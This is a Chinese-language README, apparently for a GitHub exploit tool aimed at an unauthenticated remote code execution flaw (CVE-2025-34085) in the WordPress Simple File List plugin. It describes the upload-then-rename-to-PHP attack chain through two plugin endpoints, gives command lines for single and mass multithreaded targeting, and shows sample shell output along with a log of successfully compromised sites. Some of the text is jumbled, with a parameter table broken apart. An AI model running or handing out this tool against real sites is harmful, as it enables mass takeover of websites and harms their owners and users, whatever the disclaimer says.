用于检测和利用 WordPress Simple File List 插件上无需身份验证的 远程代码执行(RCE) 漏洞的自动化工具,尤其针对受 CVE-2025-34085 影响的版本。
内置目标自动清理系统,并支持多线程,适合大规模高效扫描。
无需身份验证上传文件
/wp-content/plugins/simple-file-list/ee-upload-engine.php将文件重命名为 .php
/wp-content/plugins/simple-file-list/ee-file-engine.php执行远程载荷
python3 main.py -u http://target.com --cmd "id"
将目标列表放入 targets.txt 文件,每行一个:
python3 main.py --cmd "uname -a"
| 参数 | 描述 |
|---|---|
-u | 单个目标(例如:http://example.com) |
--cmd |
[+] http://target.com | http://target.com/wp-content/uploads/simple-file-list/shell.php
uid=33(www-data) gid=33(www-data) groups=33(www-data)
利用成功的目标将自动保存到 vuln.txt 文件中。
main.py — 主脚本targets.txt — 目标列表clean_targets.txt — URL 规范化结果vuln.txt — 成功利用的目标日志targets.txt 中的异常字符并修复 URL 格式建议 WordPress 网站管理员:
本项目仅用于 学习和合法测试。
用于非法目的,责任由使用者个人承担。
Cyberlone Indonesia 不对滥用本工具的行为负责。
许可证:MIT License
欢迎出于合法且负责任的目的自由使用、修改和分发。
Cyberlone Indonesia
🛠️ 研究与利用团队
🔗 GitHub: https://github.com/yukinime
👨💻 0xgh057r3c0n
🔗 GitHub: github.com/0xgh057r3c0n
要在目标上执行的命令(默认:id) |
--inline | 使用内联载荷(不使用 ?cmd= 参数) |